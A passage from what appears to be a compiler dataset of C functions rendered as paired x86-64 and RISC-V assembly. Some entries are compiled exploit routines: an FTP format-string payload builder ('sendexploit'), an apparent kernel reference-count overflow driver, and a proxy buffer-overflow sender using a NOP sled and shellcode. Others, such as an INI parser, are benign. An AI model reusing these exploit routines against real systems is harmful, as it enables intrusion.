%r13, %rsi call strcat@PLT movq %r14, %rdi call strlen@PLT cmpl $31, %eax jle .L4 jmp .L5 .L16: call __stack_chk_fail@PLT .cfi_endproc .LFE1: .size sendexploit, .-sendexploit .globl targets .bss .align 8 .type targets, @object .size targets, 8 targets: .zero 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_372.c_sendexploit_aug_v3_8.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "%c%c%c%c%c%c%c%c%%%du%%18$hn%%%du%%19$hn" .align 3 .LC1: .string "SITE MSG SEND %s %s%s\n" .align 3 .LC2: .string "[*] len: %d, sending code [%s]\n" .align 3 .LC3: .string "_" .text .align 1 .globl sendexploit .type sendexploit, @function sendexploit: slli a2,a2,3 ld a5,.LANCHOR0 addi sp,sp,-304 add a5,a5,a2 sd s1,280(sp) sd s5,248(sp) lw s1,0(a5) lw s5,4(a5) li t0,-4096 li a5,4096 sd s2,272(sp) sd s3,264(sp) sd s4,256(sp) sd s6,240(sp) sd s7,232(sp) sd ra,296(sp) sd s0,288(sp) sd s8,224(sp) sd s9,216(sp) addi a4,a5,200 add sp,sp,t0 la s4,__stack_chk_guard add a4,a4,sp slli s7,s1,48 ld a5, 0(s4) sd a5, 0(a4) li a5, 0 srliw a5,s1,16 srli s7,s7,48 mv s3,a1 mv s2,a0 mv a1,a3 mv s1,a5 addiw s6,s5,2 bgtu a5,s7,.L2 mv a4,s5 mv a5,s7 mv s5,s6 mv s7,s1 mv s6,a4 mv s1,a5 .L2: beq a1,zero,.L3 li a0,-4096 li a5,4096 addi a0,a0,-152 addi a5,a5,208 add a5,a5,a0 add a0,a5,sp call strcpy@plt .L3: li s0,-4096 li a5,4096 addi s0,s0,-152 addi a5,a5,208 add a5,a5,s0 add s0,a5,sp mv a0,s0 call strlen@plt li a5,31 bgt a0,a5,.L5 lla s9,.LC3 li s8,31 .L4: mv a1,s9 mv a0,s0 call strcat@plt mv a0,s0 call strlen@plt ble a0,s8,.L4 .L5: li s9,4096 li s0,-4096 addi s8,s0,-152 addi a5,s9,208 add a5,a5,s8 add s8,a5,sp mv a0,s8 call strlen@plt addiw a4,a0,16 subw a4,s7,a4 slliw a4,a4,16 srliw t1,a4,16 addi s7,s0,-80 addi a5,s9,208 subw s1,s1,t1 add a5,a5,s7 sraiw t4,s6,16 sraiw t3,s6,8 andi t4,t4,0xff andi t3,t3,0xff add s7,a5,sp addiw s1,s1,-48 srliw a0,s6,24 sraiw a5,s5,16 sraiw a4,s5,8 andi a7,s6,0xff srliw a6,s5,24 sd t1,24(sp) sd t4,8(sp) sd t3,0(sp) andi a5,a5,0xff andi a4,a4,0xff andi a3,s5,0xff lla a2,.LC0 li a1,68 sd s1,32(sp) sd a0,16(sp) mv a0,s7 call snprintf@plt addi s0,s0,-8 addi a5,s9,208 add a5,a5,s0 add s0,a5,sp mv a4,s8 mv a5,s7 mv a3,s3 li a1,4096 lla a2,.LC1 mv a0,s0 call snprintf@plt mv a0,s8 call strlen@plt mv s1,a0 mv a0,s7 call strlen@plt addw a1,s1,a0 mv a2,s0 lla a0,.LC2 call printf@plt mv a0,s0 call strlen@plt mv a2,a0 mv a1,s0 mv a0,s2 call write@plt addi a5,s9,200 add a5,a5,sp ld a4, 0(a5) ld a5, 0(s4) xor a5, a4, a5 li a4, 0 bne a5,zero,.L15 li t0,4096 add sp,sp,t0 ld ra,296(sp) ld s0,288(sp) ld s1,280(sp) ld s2,272(sp) ld s3,264(sp) ld s4,256(sp) ld s5,248(sp) ld s6,240(sp) ld s7,232(sp) ld s8,224(sp) ld s9,216(sp) addi sp,sp,304 jr ra .L15: call __stack_chk_fail@plt .size sendexploit, .-sendexploit .globl targets .bss .align 3 .set .LANCHOR0,. + 0 .type targets, @object .size targets, 8 targets: .zero 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_40181.c_main_aug_v3_8
.file "extr_40181.c_main_aug_v3_8.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "failed to open HASH_PATH" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC1: .string "[*] forking to speed up initial reference count increments\n" .align 8 .LC2: .string "[*] initial reference count increase finished\n" .section .rodata.str1.1 .LC3: .string "[*] entering profile\n" .LC4: .string "/sbin/dhclient" .LC5: .string "/proc/self/net/arp" .section .rodata.str1.8 .align 8 .LC6: .string "[*] past the point of no return" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB1: .cfi_startproc endbr64 pushq %r13 .cfi_def_cfa_offset 16 .cfi_offset 13, -16 pushq %r12 .cfi_def_cfa_offset 24 .cfi_offset 12, -24 pushq %rbp .cfi_def_cfa_offset 32 .cfi_offset 6, -32 pushq %rbx .cfi_def_cfa_offset 40 .cfi_offset 3, -40 subq $1064, %rsp .cfi_def_cfa_offset 1104 movl O_RDONLY(%rip), %esi movq HASH_PATH(%rip), %rdi movq %fs:40, %rax movq %rax, 1048(%rsp) xorl %eax, %eax call open@PLT movl %eax, %r12d testl %eax, %eax js .L17 .L2: movl stderr(%rip), %edi leaq .LC1(%rip), %rsi movl $15, %ebx call fprintf@PLT jmp .L4 .p2align 4,,10 .p2align 3 .L3: subl $1, %ebx je .L18 .L4: xorl %eax, %eax call fork@PLT testq %rax, %rax jne .L3 movl %r12d, %edi movl $286331136, %esi call add_references@PLT xorl %edi, %edi call exit@PLT subl $1, %ebx jne .L4 .L18: movl $15, %ebx leaq 12(%rsp), %rbp .p2align 4,,10 .p2align 3 .L5: movq %rbp, %rdi call wait@PLT subl $1, %ebx jne .L5 movl stderr(%rip), %edi leaq .LC2(%rip), %rsi call fprintf@PLT movl stderr(%rip), %edi leaq .LC3(%rip), %rsi call fprintf@PLT leaq .LC4(%rip), %rdi call aa_change_profile@PLT xorl %eax, %eax call fork@PLT testq %rax, %rax je .L6 leaq 16(%rsp), %rbx leaq 1040(%rsp), %r12 movq %rbx, %rbp leaq .LC5(%rip), %r13 .p2align 4,,10 .p2align 3 .L7: movl O_RDONLY(%rip), %esi movq %r13, %rdi addq $4, %rbp call open@PLT movl %eax, -4(%rbp) cmpq %rbp, %r12 jne .L7 .L8: movl stderr(%rip), %edi leaq .LC6(%rip), %rsi call fprintf@PLT movl $5, %edi call sleep@PLT .p2align 4,,10 .p2align 3 .L9: movl (%rbx), %edi addq $4, %rbx call close@PLT cmpq %rbx, %r12 jne .L9 movq 1048(%rsp), %rax subq %fs:40, %rax jne .L19 addq $1064, %rsp .cfi_remember_state .cfi_def_cfa_offset 40 xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 32 popq %rbp .cfi_def_cfa_offset 24 popq %r12 .cfi_def_cfa_offset 16 popq %r13 .cfi_def_cfa_offset 8 ret .L6: .cfi_restore_state movl %r12d, %edi movl $256, %esi leaq 16(%rsp), %rbx call add_references@PLT xorl %edi, %edi leaq 1040(%rsp), %r12 call exit@PLT jmp .L8 .L17: leaq .LC0(%rip), %rsi orl $-1, %edi call err@PLT jmp .L2 .L19: call __stack_chk_fail@PLT .cfi_endproc .LFE1: .size main, .-main .globl stderr .bss .align 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .globl O_RDONLY .align 4 .type O_RDONLY, @object .size O_RDONLY, 4 O_RDONLY: .zero 4 .globl HASH_PATH .align 8 .type HASH_PATH, @object .size HASH_PATH, 8 HASH_PATH: .zero 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_40181.c_main_aug_v3_8.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "failed to open HASH_PATH" .align 3 .LC1: .string "[*] forking to speed up initial reference count increments\n" .align 3 .LC2: .string "[*] initial reference count increase finished\n" .align 3 .LC3: .string "[*] entering profile\n" .align 3 .LC4: .string "/sbin/dhclient" .align 3 .LC5: .string "/proc/self/net/arp" .align 3 .LC6: .string "[*] past the point of no return" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-1104 sd s3,1064(sp) lla s3,.LANCHOR0 lw a1,0(s3) ld a0,8(s3) sd s5,1048(sp) la s5,__stack_chk_guard ld a5, 0(s5) sd a5, 1032(sp) li a5, 0 sd s2,1072(sp) sd ra,1096(sp) sd s0,1088(sp) sd s1,1080(sp) sd s4,1056(sp) call open@plt mv s2,a0 blt a0,zero,.L17 .L2: lw a0,16(s3) lla a1,.LC1 li s1,286330880 li s0,15 call fprintf@plt addi s1,s1,256 j .L4 .L3: addiw s0,s0,-1 beq s0,zero,.L18 .L4: call fork@plt bne a0,zero,.L3 mv a1,s1 mv a0,s2 call add_references@plt li a0,0 addiw s0,s0,-1 call exit@plt bne s0,zero,.L4 .L18: li s0,15 addi s1,sp,4 .L5: addiw s0,s0,-1 mv a0,s1 call wait@plt bne s0,zero,.L5 lw a0,16(s3) lla a1,.LC2 call fprintf@plt lw a0,16(s3) lla a1,.LC3 call fprintf@plt lla a0,.LC4 call aa_change_profile@plt call fork@plt beq a0,zero,.L6 addi s0,sp,8 mv s1,s0 addi s2,sp,1032 lla s4,.LC5 .L7: lw a1,0(s3) mv a0,s4 addi s1,s1,4 call open@plt sw a0,-4(s1) bne s2,s1,.L7 .L8: lw a0,16(s3) lla a1,.LC6 call fprintf@plt li a0,5 call sleep@plt .L9: lw a0,0(s0) addi s0,s0,4 call close@plt bne s2,s0,.L9 ld a4, 1032(sp) ld a5, 0(s5) xor a5, a4, a5 li a4, 0 bne a5,zero,.L19 ld ra,1096(sp) ld s0,1088(sp) ld s1,1080(sp) ld s2,1072(sp) ld s3,1064(sp) ld s4,1056(sp) ld s5,1048(sp) li a0,0 addi sp,sp,1104 jr ra .L6: li a1,256 mv a0,s2 call add_references@plt li a0,0 call exit@plt addi s0,sp,8 addi s2,sp,1032 j .L8 .L17: lla a1,.LC0 li a0,-1 call err@plt j .L2 .L19: call __stack_chk_fail@plt .size main, .-main .globl stderr .globl O_RDONLY .globl HASH_PATH .bss .align 3 .set .LANCHOR0,. + 0 .type O_RDONLY, @object .size O_RDONLY, 4 O_RDONLY: .zero 4 .zero 4 .type HASH_PATH, @object .size HASH_PATH, 8 HASH_PATH: .zero 8 .type stderr, @object .size stderr, 4 stderr: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_11315.c_print_aug_v3_1
.file "extr_11315.c_print_aug_v3_1.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "[*]%s\n" .text .p2align 4 .globl print .type print, @function print: .LFB0: .cfi_startproc endbr64 movq %rdi, %rsi leaq .LC0(%rip), %rdi jmp printf@PLT .cfi_endproc .LFE0: .size print, .-print .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_11315.c_print_aug_v3_1.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "[*]%s\n" .text .align 1 .globl print .type print, @function print: mv a1,a0 lla a0,.LC0 tail printf@plt .size print, .-print .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_inicache.c_IniCacheLoadFromMemory_aug_v3_2
.file "extr_inicache.c_IniCacheLoadFromMemory_aug_v3_2.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "RtlAllocateHeap() failed\n" .LC1: .string "[%.*s]\n" .LC2: .string "IniCacheAddSection() failed\n" .LC3: .string "'%.*s' = '%.*s'\n" .LC4: .string "IniCacheAddKey() failed\n" .text .p2align 4 .globl IniCacheLoadFromMemory .type IniCacheLoadFromMemory, @function IniCacheLoadFromMemory: .LFB25: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 movq %rsi, %r15 movl $4, %edx pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 movq %rdi, %r12 pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 movl %ecx, %ebp pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 subq $56, %rsp .cfi_def_cfa_offset 112 movl HEAP_ZERO_MEMORY(%rip), %esi movl ProcessHeap(%rip), %edi movq %fs:40, %rax movq %rax, 40(%rsp) xorl %eax, %eax call RtlAllocateHeap@PLT movq %rax, (%r12) testq %rax, %rax je .L2 testq %r15, %r15 je .L5 xorl %ebx, %ebx leaq .LC3(%rip), %r13 leaq .LC1(%rip), %r14 .p2align 4,,10 .p2align 3 .L3: cmpb $0, (%r15) je .L5 movq %r15, %rdi call IniCacheSkipWhitespace@PLT movq %rax, %rdi testq %rax, %rax je .L5 cmpb $91, (%rax) je .L20 testq %rbx, %rbx je .L21 leaq 8(%rsp), %rdx leaq 24(%rsp), %rsi call IniCacheGetKeyName@PLT leaq 12(%rsp), %rdx leaq 32(%rsp), %rsi movl %ebp, %ecx movq %rax, %rdi call IniCacheGetKeyValue@PLT movl 12(%rsp), %ecx movl 8(%rsp), %esi movq %r13, %rdi movq 32(%rsp), %r8 movq 24(%rsp), %rdx movq %rax, %r15 xorl %eax, %eax call DPRINT@PLT movl 12(%rsp), %r8d movq 32(%rsp), %rcx movq %rbx, %rdi movl 8(%rsp), %edx movq 24(%rsp), %rsi call IniCacheAddKey@PLT testq %rax, %rax je .L22 .L7: testq %r15, %r15 jne .L3 .p2align 4,,10 .p2align 3 .L5: movl STATUS_SUCCESS(%rip), %eax .L1: movq 40(%rsp), %rdx subq %fs:40, %rdx jne .L23 addq $56, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L20: .cfi_restore_state addq $1, %rdi leaq 4(%rsp), %rdx leaq 16(%rsp), %rsi call IniCacheGetSectionName@PLT movq 16(%rsp), %rdx movl 4(%rsp), %esi movq %r14, %rdi movq %rax, %r15 xorl %eax, %eax call DPRINT@PLT movl 4(%rsp), %edx movq 16(%rsp), %rsi movq (%r12), %rdi call IniCacheAddSection@PLT movq %rax, %rbx testq %rax, %rax jne .L7 leaq .LC2(%rip), %rdi xorl %eax, %eax call DPRINT@PLT movq %r15, %rdi call IniCacheSkipToNextSection@PLT movq %rax, %r15 jmp .L7 .p2align 4,,10 .p2align 3 .L21: call IniCacheSkipToNextSection@PLT movq %rax, %r15 jmp .L7 .p2align 4,,10 .p2align 3 .L22: leaq .LC4(%rip), %rdi call DPRINT@PLT jmp .L7 .p2align 4,,10 .p2align 3 .L2: leaq .LC0(%rip), %rdi xorl %eax, %eax call DPRINT@PLT movl STATUS_INSUFFICIENT_RESOURCES(%rip), %eax jmp .L1 .L23: call __stack_chk_fail@PLT .cfi_endproc .LFE25: .size IniCacheLoadFromMemory, .-IniCacheLoadFromMemory .globl STATUS_SUCCESS .bss .align 4 .type STATUS_SUCCESS, @object .size STATUS_SUCCESS, 4 STATUS_SUCCESS: .zero 4 .globl STATUS_INSUFFICIENT_RESOURCES .align 4 .type STATUS_INSUFFICIENT_RESOURCES, @object .size STATUS_INSUFFICIENT_RESOURCES, 4 STATUS_INSUFFICIENT_RESOURCES: .zero 4 .globl ProcessHeap .align 4 .type ProcessHeap, @object .size ProcessHeap, 4 ProcessHeap: .zero 4 .globl HEAP_ZERO_MEMORY .align 4 .type HEAP_ZERO_MEMORY, @object .size HEAP_ZERO_MEMORY, 4 HEAP_ZERO_MEMORY: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_inicache.c_IniCacheLoadFromMemory_aug_v3_2.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "RtlAllocateHeap() failed\n" .align 3 .LC1: .string "[%.*s]\n" .align 3 .LC2: .string "IniCacheAddSection() failed\n" .align 3 .LC3: .string "'%.*s' = '%.*s'\n" .align 3 .LC4: .string "IniCacheAddKey() failed\n" .text .align 1 .globl IniCacheLoadFromMemory .type IniCacheLoadFromMemory, @function IniCacheLoadFromMemory: addi sp,sp,-176 sd s9,88(sp) lla s9,.LANCHOR0 mv a5,a1 sd s3,136(sp) lw a1,0(s9) mv s3,a0 lw a0,4(s9) sd s0,160(sp) sd s3,8(sp) mv s0,s3 mv s3,a5 la a5,__stack_chk_guard li a2,4 ld a4, 0(a5) sd a4, 56(sp) li a4, 0 sd s2,144(sp) sd ra,168(sp) sd s1,152(sp) sd s4,128(sp) sd s5,120(sp) sd s6,112(sp) sd s7,104(sp) sd s8,96(sp) sd s10,80(sp) sd s11,72(sp) mv s2,a3 call RtlAllocateHeap@plt sd a0,0(s0) beq a0,zero,.L2 li s0,0 beq s3,zero,.L5 li s1,91 addi s8,sp,24 addi s7,sp,40 addi s6,sp,28 addi s5,sp,48 lla s4,.LC3 addi s11,sp,20 addi s10,sp,32 .L3: lbu a4,0(s3) beq a4,zero,.L5 mv a0,s3 call IniCacheSkipWhitespace@plt beq a0,zero,.L5 lbu a4,0(a0) beq a4,s1,.L21 beq s0,zero,.L22 mv a2,s8 mv a1,s7 call IniCacheGetKeyName@plt mv a3,s2 mv a2,s6 mv a1,s5 call IniCacheGetKeyValue@plt ld a4,48(sp) lw a3,28(sp) ld a2,40(sp) lw a1,24(sp) mv s3,a0 mv a0,s4 call DPRINT@plt lw a4,28(sp) ld a3,48(sp) lw a2,24(sp) ld a1,40(sp) mv a0,s0 call IniCacheAddKey@plt beq a0,zero,.L23 .L7: bne s3,zero,.L3 .L5: lw a0,8(s9) .L4: la a5,__stack_chk_guard ld a4, 56(sp) ld a5, 0(a5) xor a5, a4, a5 li a4, 0 bne a5,zero,.L24 ld ra,168(sp) ld s0,160(sp) ld s1,152(sp) ld s2,144(sp) ld s3,136(sp) ld s4,128(sp) ld s5,120(sp) ld s6,112(sp) ld s7,104(sp) ld s8,96(sp) ld s9,88(sp) ld s10,80(sp) ld s11,72(sp) addi sp,sp,176 jr ra .L23: lla a0,.LC4 call DPRINT@plt bne s3,zero,.L3 j .L5 .L21: mv a2,s11 mv a1,s10 addi a0,a0,1 call IniCacheGetSectionName@plt ld a2,32(sp) lw a1,20(sp) mv s3,a0 lla a0,.LC1 call DPRINT@plt ld a5,8(sp) lw a2,20(sp) ld a1,32(sp) ld a0,0(a5) call IniCacheAddSection@plt mv s0,a0 bne a0,zero,.L7 lla a0,.LC2 call DPRINT@plt mv a0,s3 call IniCacheSkipToNextSection@plt mv s3,a0 bne s3,zero,.L3 j .L5 .L22: call IniCacheSkipToNextSection@plt mv s3,a0 bne s3,zero,.L3 j .L5 .L2: lla a0,.LC0 call DPRINT@plt lw a0,12(s9) j .L4 .L24: call __stack_chk_fail@plt .size IniCacheLoadFromMemory, .-IniCacheLoadFromMemory .globl STATUS_SUCCESS .globl STATUS_INSUFFICIENT_RESOURCES .globl ProcessHeap .globl HEAP_ZERO_MEMORY .bss .align 2 .set .LANCHOR0,. + 0 .type HEAP_ZERO_MEMORY, @object .size HEAP_ZERO_MEMORY, 4 HEAP_ZERO_MEMORY: .zero 4 .type ProcessHeap, @object .size ProcessHeap, 4 ProcessHeap: .zero 4 .type STATUS_SUCCESS, @object .size STATUS_SUCCESS, 4 STATUS_SUCCESS: .zero 4 .type STATUS_INSUFFICIENT_RESOURCES, @object .size STATUS_INSUFFICIENT_RESOURCES, 4 STATUS_INSUFFICIENT_RESOURCES: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_3913.c_proxy_connect_aug_v3_2
.file "extr_3913.c_proxy_connect_aug_v3_2.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "[*] attempting to connect: %s:%d.\n" .section .rodata.str1.1,"aMS",@progbits,1 .LC1: .string "couldn't resolve hostname." .section .rodata.str1.8 .align 8 .LC2: .string "webdesproxy connection failed." .align 8 .LC3: .string "[*] successfully connected: %s:%d.\n" .section .rodata.str1.1 .LC4: .string "[*] sending string:" .section .rodata.str1.8 .align 8 .LC5: .string "[+] \"GET http://[NOPSx250][JMP4][EIP/\"CALL ESP\"][NOPSx32][SHELLCODE]/\\n\\n\"" .section .rodata.str1.1 .LC6: .string "[*] closing connection.\n" .text .p2align 4 .globl proxy_connect .type proxy_connect, @function proxy_connect: .LFB1: .cfi_startproc endbr64 pushq %r14 .cfi_def_cfa_offset 16 .cfi_offset 14, -16 pushq %r13 .cfi_def_cfa_offset 24 .cfi_offset 13, -24 movq %rdi, %r13 pushq %r12 .cfi_def_cfa_offset 32 .cfi_offset 12, -32 movl %esi, %r12d pushq %rbp .cfi_def_cfa_offset 40 .cfi_offset 6, -40 movzwl %r12w, %r12d pushq %rbx .cfi_def_cfa_offset 48 .cfi_offset 3, -48 subq $32, %rsp .cfi_def_cfa_offset 80 movl IPPROTO_TCP(%rip), %edx movl SOCK_STREAM(%rip), %esi movq %fs:40, %rax movq %rax, 24(%rsp) xorl %eax, %eax movl AF_INET(%rip), %edi leaq 12(%rsp), %r14 call socket@PLT movl %r12d, %edi movl %eax, %ebp movl AF_INET(%rip), %eax movl %eax, 20(%rsp) call htons@PLT movl %r12d, %edx movq %r13, %rsi leaq .LC0(%rip), %rdi movl %eax, 16(%rsp) xorl %eax, %eax call printf@PLT movq %r13, %rdi call inet_addr@PLT movl %eax, 12(%rsp) testl %eax, %eax jne .L15 .L2: movl sig_alarm(%rip), %esi movl SIGALRM(%rip), %edi call signal@PLT movl TIMEOUT(%rip), %edi call alarm@PLT movl $12, %edx movq %r14, %rsi movl %ebp, %edi call connect@PLT testq %rax, %rax jne .L16 .L4: xorl %edi, %edi call alarm@PLT movl %r12d, %edx movq %r13, %rsi xorl %eax, %eax leaq .LC3(%rip), %rdi call printf@PLT movl $1, %edi call sleep@PLT leaq .LC4(%rip), %rdi call puts@PLT leaq .LC5(%rip), %rdi call puts@PLT movl tbl(%rip), %edi movl BUFSIZE(%rip), %r12d call getbuf@PLT movl %r12d, %edx movl %ebp, %edi movl %eax, %esi call write@PLT movl $1, %edi call sleep@PLT leaq .LC6(%rip), %rdi call puts@PLT movl %ebp, %edi call close@PLT movq 24(%rsp), %rax subq %fs:40, %rax jne .L17 addq $32, %rsp .cfi_remember_state .cfi_def_cfa_offset 48 xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 40 popq %rbp .cfi_def_cfa_offset 32 popq %r12 .cfi_def_cfa_offset 24 popq %r13 .cfi_def_cfa_offset 16 popq %r14 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L15: .cfi_restore_state movq %r13, %rdi call gethostbyname@PLT movq %rax, %rbx testq %rax, %rax je .L18 .L3: leaq 12(%rsp), %r14 movq (%rbx), %rsi movl $4, %edx movq %r14, %rdi call memcpy@PLT jmp .L2 .p2align 4,,10 .p2align 3 .L16: movl $1, %esi leaq .LC2(%rip), %rdi call printe@PLT jmp .L4 .p2align 4,,10 .p2align 3 .L18: movl $1, %esi leaq .LC1(%rip), %rdi call printe@PLT jmp .L3 .L17: call __stack_chk_fail@PLT .cfi_endproc .LFE1: .size proxy_connect, .-proxy_connect .globl tbl .bss .align 4 .type tbl, @object .size tbl, 4 tbl: .zero 4 .globl sig_alarm .align 4 .type sig_alarm, @object .size sig_alarm, 4 sig_alarm: .zero 4 .globl TIMEOUT .align 4 .type TIMEOUT, @object .size TIMEOUT, 4 TIMEOUT: .zero 4 .globl SOCK_STREAM .align 4 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .globl SIGALRM .align 4 .type SIGALRM, @object .size SIGALRM, 4 SIGALRM: .zero 4 .globl IPPROTO_TCP .align 4 .type IPPROTO_TCP, @object .size IPPROTO_TCP, 4 IPPROTO_TCP: .zero 4 .globl BUFSIZE .align 4 .type BUFSIZE, @object .size BUFSIZE, 4 BUFSIZE: .zero 4 .globl AF_INET .align 4 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .globl g_aug_volatile_6168 .data .align 4 .type g_aug_volatile_6168, @object .size g_aug_volatile_6168, 4 g_aug_volatile_6168: .long 5 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_3913.c_proxy_connect_aug_v3_2.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "[*] attempting to connect: %s:%d.\n" .align 3 .LC1: .string "couldn't resolve hostname." .align 3 .LC2: .string "webdesproxy connection failed." .align 3 .LC3: .string "[*] successfully connected: %s:%d.\n" .align 3 .LC4: .string "[*] sending string:" .align 3 .LC5: .string "[+] \"GET http://[NOPSx250][JMP4][EIP/\"CALL ESP\"][NOPSx32][SHELLCODE]/\\n\\n\"" .align 3 .LC6: .string "[*] closing connection.\n" .text .align 1 .globl proxy_connect .type proxy_connect, @function proxy_connect: addi sp,sp,-96 sd s0,80(sp) lla s0,.LANCHOR0 lw a2,0(s0) sd s1,72(sp) sd s3,56(sp) mv s1,a0 mv s3,a1 lw a0,8(s0) lw a1,4(s0) sd s4,48(sp) la s4,__stack_chk_guard ld a5, 0(s4) sd a5, 24(sp) li a5, 0 sd ra,88(sp) sd s2,64(sp) sd s5,40(sp) call socket@plt lw a5,8(s0) mv s2,a0 mv a0,s3 sw a5,16(sp) sext.w s3,s3 call htons@plt mv a5,a0 mv a2,s3 mv a1,s1 lla a0,.LC0 sw a5,12(sp) call printf@plt mv a0,s1 call inet_addr@plt sw a0,8(sp) addi s5,sp,8 bne a0,zero,.L15 .L2: lw a1,12(s0) lw a0,16(s0) call signal@plt lw a0,20(s0) call alarm@plt li a2,12 mv a1,s5 mv a0,s2 call connect@plt bne a0,zero,.L16 .L4: li a0,0 call alarm@plt mv a2,s3 mv a1,s1 lla a0,.LC3 call printf@plt li a0,1 call sleep@plt lla a0,.LC4 call puts@plt lla a0,.LC5 call puts@plt lw a0,24(s0) call getbuf@plt lw a2,28(s0) mv a1,a0 mv a0,s2 call write@plt li a0,1 call sleep@plt lla a0,.LC6 call puts@plt mv a0,s2 call close@plt ld a4, 24(sp) ld a5, 0(s4) xor a5, a4, a5 li a4, 0 bne a5,zero,.L17 ld ra,88(sp) ld s0,80(sp) ld s1,72(sp) ld s2,64(sp) ld s3,56(sp) ld s4,48(sp) ld s5,40(sp) li a0,0 addi sp,sp,96 jr ra .L15: mv a0,s1 call gethostbyname@plt mv s5,a0 beq a0,zero,.L18 .L3: ld a1,0(s5) addi s5,sp,8 li a2,4 mv a0,s5 call memcpy@plt j .L2 .L16: li a1,1 lla a0,.LC2 call printe@plt j .L4 .L18: li a1,1 lla a0,.LC1 call printe@plt j .L3 .L17: call __stack_chk_fail@plt .size proxy_connect, .-proxy_connect .globl tbl .globl sig_alarm .globl TIMEOUT .globl SOCK_STREAM .globl SIGALRM .globl IPPROTO_TCP .globl BUFSIZE .globl AF_INET .globl g_aug_volatile_6168 .data .align 2 .type g_aug_volatile_6168, @object .size g_aug_volatile_6168, 4 g_aug_volatile_6168: .word 5 .bss .align 3 .set .LANCHOR0,. + 0 .type IPPROTO_TCP, @object .size IPPROTO_TCP, 4 IPPROTO_TCP: .zero 4 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .type sig_alarm, @object .size sig_alarm, 4 sig_alarm: .zero 4 .type SIGALRM, @object .size SIGALRM, 4 SIGALRM: .zero 4 .type TIMEOUT, @object .size TIMEOUT, 4 TIMEOUT: .zero 4 .type tbl, @object .size tbl, 4 tbl: .zero 4 .type BUFSIZE, @object .size BUFSIZE, 4 BUFSIZE: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_pkcs7_verify.c_pkcs7_digest_aug_v3_6
